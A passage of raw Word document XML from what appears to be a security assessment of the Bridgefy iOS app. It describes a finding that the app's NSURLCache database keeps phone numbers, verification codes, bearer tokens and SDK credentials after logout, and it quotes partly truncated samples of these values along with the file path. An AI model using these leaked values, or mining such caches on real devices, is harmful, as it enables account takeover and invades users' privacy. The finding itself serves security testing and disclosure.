        <w:ind w:left="720" w:right="363"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>consulted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>below.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>It</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>noted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is possible to retrieve all this data when the app says that the user is logged out.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Leaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>NSURLCache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Artifacts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>examples</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>possible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>retrieve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>PII,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>credentials,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and authentication tokens by observing the contents of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>NSURLCache</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Library/Caches/com.bridgefy.BridgefyNewStaging/Cache.db</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>On</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="50"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="53"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>cfurl_cache_blob_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="53"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>table,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="53"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>inspect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="52"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="53"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>contents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="38"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>request_object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="39"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>response_object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>columns,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>some</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>interesting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>values</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>presented</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>next:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(Phone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>verification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>code):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]"code":"301496","versionOs":"13.5","phone":"+12066561175"[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="117"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(App</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>token):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Authorization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Bearer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>eyJhbGciOiJSUzI1NiIsImtpZCI6ImNlOWI4ODBmODE4MmRkYTU1N2Y3YzcwZTIwZTRlMzcwZTNkMTI3NDciLCJ 0eXAiOiJKV1QifQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.eyJuYW1lIjoiKz[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(SDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>credentials):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"deviceType"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:1,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"hash"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"c2b717a538665c6b37a2b5fc2d7b9db01437a6afeb6c0517b887c0a076a3d32 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>e"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"timestamp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"2023-01-07T08:08:40.392-05:00"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"userId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"a5744b00-305a-4c9d-8672-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>30f8ef</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ac060c"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bundleId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.bridgefy.BridgefyNewStaging"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"version"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"0.1.0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(SDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>token):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Authorization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Bearer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.eyJsaWNlbnNl[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
